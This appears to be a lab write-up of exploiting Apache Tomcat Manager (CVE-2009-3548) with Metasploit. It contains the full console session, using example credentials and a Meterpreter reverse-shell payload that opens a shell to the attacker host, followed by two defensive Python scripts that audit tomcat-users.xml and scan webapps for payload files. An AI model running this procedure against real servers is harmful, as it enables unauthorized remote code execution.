BT5 MSF CVE-2009-3548 Apache Tomcat Manager - Application Upload Authenticated Code Execution  by k8team

2014-08-31 01:35:32 | Category: BT5/Kali/MSF

http://www.exploit-db.com/exploits/31433/

The module's reference list, from the copy at the URL above:

          #  The following references refer to HP Operations Manager
          ['CVE', '2009-3843'],
          ['OSVDB', '60317'],
          ['CVE', '2009-4189'],
          ['OSVDB', '60670'],
 
          # HP Operations Dashboard
          ['CVE', '2009-4188'],
 
          # IBM Cognos Express Default user/pass
          ['BID', '38084'],
          ['CVE', '2010-0557'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
 
          # IBM Rational Quality Manager and Test Lab Manager
          ['CVE', '2010-4094'],
          ['ZDI', '10-214'],
 
          # 'admin' password is blank in default Windows installer
          ['CVE', '2009-3548'],
          ['OSVDB', '60176'],
          ['BID', '36954'],
msf > search 2009-3548

Matching Modules
================

   Name                                     Disclosure Date          Rank       Description
   ----                                     ---------------          ----       -----------
   auxiliary/scanner/http/tomcat_mgr_login                           normal     Tomcat Application Manager Login Utility
   exploit/multi/http/tomcat_mgr_deploy     2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload     2009-11-09 00:00:00 UTC  excellent  Apache Tomcat Manager Authenticated Upload Code Execution
msf > use exploit/multi/http/tomcat_mgr_upload


msf exploit(tomcat_mgr_upload) > set RHOST 192.168.85.169
RHOST => 192.168.85.169

msf exploit(tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080

msf exploit(tomcat_mgr_upload) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_upload) > set PASSWORD s3cret
PASSWORD => s3cret
msf exploit(tomcat_mgr_upload) > exploit


// The account and password are not necessarily the ones hinted at on the page; that is only the example shown in Tomcat's configuration.
// Only when a developer is lazy and copies or enables the example from the config file does this lead to the so-called "default password".

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.85.158   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse handler on 192.168.85.158:4444
[*] 192.168.85.169:8080 - Retrieving session ID and CSRF token...
[-] Exploit failed: Unable to access the Tomcat Manager
msf exploit(tomcat_mgr_upload) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_upload) > set PASSWORD s3cret
PASSWORD => s3cret
msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse handler on 192.168.85.158:4444
[*] 192.168.85.169:8080 - Retrieving session ID and CSRF token...
[-] Exploit failed: Unable to access the Tomcat Manager
msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse handler on 192.168.85.158:4444
[*] 192.168.85.169:8080 - Retrieving session ID and CSRF token...
[*] 192.168.85.169:8080 - Uploading and deploying 5LJ1THgYKYPAwebYg8FYh...
[*] 192.168.85.169:8080 - Executing 5LJ1THgYKYPAwebYg8FYh...
[*] 192.168.85.169:8080 - Undeploying 5LJ1THgYKYPAwebYg8FYh ...
[*] Sending stage (30355 bytes) to 192.168.85.169
[*] Meterpreter session 1 opened (192.168.85.158:4444 -> 192.168.85.169:1073) at 2014-06-23 11:26:11 +0800

meterpreter > sysinfo
Computer    : k82003-77562e10
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > ipconfig
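The comment in the session about the "default password" is really about tomcat-users.xml: Tomcat ships its example users inside an XML comment, so tomcat/s3cret only works where an administrator copied the example out. As an added example (my code, not K8team's and not part of Metasploit or Tomcat), the Python script below parses that file and lists every active user holding a Manager role, flagging passwords equal to the shipped examples. The sample file contents, the role set and the example-password list are constructed for the demo.

```python
"""Audit tomcat-users.xml for live Manager credentials.

Added example for this post (not K8team's code, not part of Metasploit or
Tomcat). Tomcat ships tomcat-users.xml with its example users inside an XML
comment; the tomcat/s3cret pair from the session only works where an
administrator copied that example out of the comment. This script lists
every *active* user that holds a Manager role and flags passwords equal to
the shipped examples.
"""
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager application (Tomcat 7+ role names).
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}

# Passwords used in Tomcat's own example configuration; extend for your site.
# (Assumption: this list is illustrative, not exhaustive.)
EXAMPLE_PASSWORDS = {"s3cret", "tomcat"}

# Constructed sample file: the shipped commented-out example, a copy an
# administrator activated, a deploy-only user, and a non-Manager user.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users>
  <!--
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  -->
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Kq9!vZ2p-constructed" roles="manager-script"/>
  <user username="app" password="s3cret" roles="tomcat"/>
</tomcat-users>
"""


def _local_name(tag):
    """Strip a namespace prefix; Tomcat 8+ files use xmlns="http://tomcat.apache.org/xml"."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return [(username, (manager roles...), uses_example_password), ...]
    for every active user with at least one Manager role.

    Commented-out users never show up: ElementTree discards XML comments,
    which is exactly how Tomcat treats the shipped example block.
    """
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []
    for el in root.iter():
        if _local_name(el.tag) != "user":
            continue
        # Tomcat's MemoryUserDatabase accepts either attribute name.
        name = el.get("username") or el.get("name") or ""
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        manager_roles = tuple(sorted(roles & MANAGER_ROLES))
        if not manager_roles:
            continue
        weak = el.get("password", "") in EXAMPLE_PASSWORDS
        findings.append((name, manager_roles, weak))
    return findings


def main():
    for name, roles, weak in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        flag = "EXAMPLE PASSWORD" if weak else "ok"
        print(f"{name:10s} {','.join(roles):30s} {flag}")


if __name__ == "__main__":
    main()
```

Point the script at a real `conf/tomcat-users.xml` by reading the file and passing its bytes to `audit_tomcat_users`; any row flagged with an example password, or any `manager-gui` user on a host that only needs scripted deployments, is what the session above relies on.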


After a successful run:

A randomly named WAR file is written to the webapps directory; Tomcat then unpacks the WAR and releases the following files:

C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\web.xml
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit.dat
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit\Payload.class
C:\tomcat7\webapps\5LJ1THgYKYPAwebYg8FYh\WEB-INF\classes\metasploit\PayloadServlet.class
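The file list above is what a defender can look for on disk. As an added example (my code, not K8team's and not part of Metasploit), the Python script below walks a Tomcat webapps directory, reports any context that contains the expanded payload files listed in the post, and separately flags context names that look machine-generated, the way the one in the session does. The directory tree it scans is constructed in a temporary directory with empty placeholder files, and the entropy thresholds are assumptions chosen for the demo.

```python
"""Scan a Tomcat webapps/ directory for a Manager-deployed Java payload.

Added example for this post (not K8team's code and not part of Metasploit).
The session above deploys a randomly named WAR that Tomcat expands into
    <ctx>/WEB-INF/classes/metasploit/Payload.class
    <ctx>/WEB-INF/classes/metasploit/PayloadServlet.class
    <ctx>/WEB-INF/classes/metasploit.dat
This script walks webapps/, reports any context containing those files, and
also flags context names that look machine-generated. The directory tree it
scans is constructed in a temp dir with empty placeholder files.
"""
import math
import tempfile
from collections import Counter
from pathlib import Path

# Relative paths the post lists inside the expanded WAR.
PAYLOAD_ARTIFACTS = (
    Path("WEB-INF/classes/metasploit/Payload.class"),
    Path("WEB-INF/classes/metasploit/PayloadServlet.class"),
    Path("WEB-INF/classes/metasploit.dat"),
)


def shannon_entropy(text):
    """Bits per character; a 21-char mixed-case alphanumeric name scores ~3.9."""
    n = len(text)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def looks_random(name, min_len=16, min_entropy=3.5):
    """Heuristic (assumption: thresholds chosen for this demo) for names like
    the one in the session; stock contexts (ROOT, manager, docs) are short."""
    return len(name) >= min_len and name.isalnum() and shannon_entropy(name) >= min_entropy


def scan_webapps(webapps_dir):
    """Return one dict per suspicious context under webapps_dir."""
    webapps = Path(webapps_dir)
    findings = []
    for ctx in sorted(p for p in webapps.iterdir() if p.is_dir()):
        present = [str(a) for a in PAYLOAD_ARTIFACTS if (ctx / a).is_file()]
        random_name = looks_random(ctx.name)
        if not present and not random_name:
            continue
        findings.append({
            "context": ctx.name,
            "artifacts": present,
            "random_name": random_name,
            # The WAR itself usually sits next to the expanded directory.
            "war_present": (webapps / f"{ctx.name}.war").is_file(),
        })
    return findings


def build_sample_tree(root):
    """Constructed sample: two stock apps plus the context named in the session."""
    root = Path(root)
    layout = {
        "ROOT": ["index.jsp", "WEB-INF/web.xml"],
        "manager": ["WEB-INF/web.xml"],
        "5LJ1THgYKYPAwebYg8FYh": [
            "WEB-INF/web.xml",
            "WEB-INF/classes/metasploit.dat",
            "WEB-INF/classes/metasploit/Payload.class",
            "WEB-INF/classes/metasploit/PayloadServlet.class",
        ],
    }
    for ctx, files in layout.items():
        for rel in files:
            path = root / ctx / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(b"")  # placeholder, not real class bytes
    return root


def demo():
    """Build the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_webapps(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Note that the session log shows the module undeploying its context right after execution, so this on-disk check is a point-in-time signal; the Manager's own access log entries for the upload and undeploy requests are the more durable record to pair it with.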